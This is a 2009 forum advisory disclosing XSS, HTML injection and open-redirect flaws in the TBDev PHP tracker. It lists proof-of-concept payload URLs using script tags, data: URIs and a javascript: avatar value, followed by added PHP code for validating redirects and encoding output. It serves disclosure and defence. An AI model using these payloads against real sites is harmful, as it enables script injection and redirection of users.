InterN0T - Advisories Advisories that are found by members of InterN0T.

Posted by MaXe, 12th June 2009, 20:58
TBDev 01-01-2008 - Multiple Vulnerabilities

TBDev - XSS and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and
develop a software (php peer-to-peer) from the original
torrentbits/bytemonsoon source code.

Credits: InterN0T

External Links:
http://www.tbdev.net


-:: The Advisory ::-
Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (Firefox 3 was tested for the other vulnerabilities)

-:: Solution ::-
Secure redirection calls with referer headers (just an example) and filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th and 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Bugtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
__________________

Quote:
Originally Posted by Norph
MaXe, I really doubt that you are able to browse ANY site more than 2 minutes before you start pwning it xD
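
The Solution section of the advisory asks for secured redirects and filtering of bad characters. The PHP below is an added example of one way to do that for the `returnto` parameter, the Info field and the Avatar field; it is not part of the original post and not TBDev code. The function names `safe_returnto`, `h` and `safe_avatar_url`, the default path and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from the TBDev source.

// Accept only a same-site relative path as a redirect target.
function safe_returnto(?string $value, string $default = '/index.php'): string
{
    if ($value === null || $value === '') {
        return $default;
    }
    // Control characters and backslashes: some browsers treat "\" like "/".
    if (preg_match('/[\x00-\x1F\x7F\\\\]/', $value)) {
        return $default;
    }
    // Exactly one leading "/" rules out "//host", "http://", "data:", "javascript:".
    if ($value[0] !== '/' || (isset($value[1]) && $value[1] === '/')) {
        return $default;
    }
    return $value;
}

// Encode for HTML text and attribute context (covers <, >, &, " and ').
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow only absolute http(s) URLs as avatar sources.
function safe_avatar_url(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true) ? $url : null;
}

// Constructed inputs modelled on the parameter shapes listed in the advisory.
$samples = ['/polls.php', '><script>alert(0)</script>', 'http://[HOST]',
            'data:text/html;base64,AAAA', '//example.invalid/'];
foreach ($samples as $s) {
    printf("%-30s => %s\n", $s, safe_returnto($s));
}

// Validate first, then encode at the point of output.
$returnto = safe_returnto($_GET['returnto'] ?? null);
echo '<input type="hidden" name="returnto" value="' . h($returnto) . "\">\n";
echo '<textarea name="info">' . h('</textarea><script>alert(0)</script>') . "</textarea>\n";
var_dump(safe_avatar_url('javascript:alert(0)'), safe_avatar_url('https://example.invalid/a.png'));
```

Validation and encoding do different jobs here: `safe_returnto` decides where a redirect may go, while `h` is still required whenever the accepted value is written back into a page.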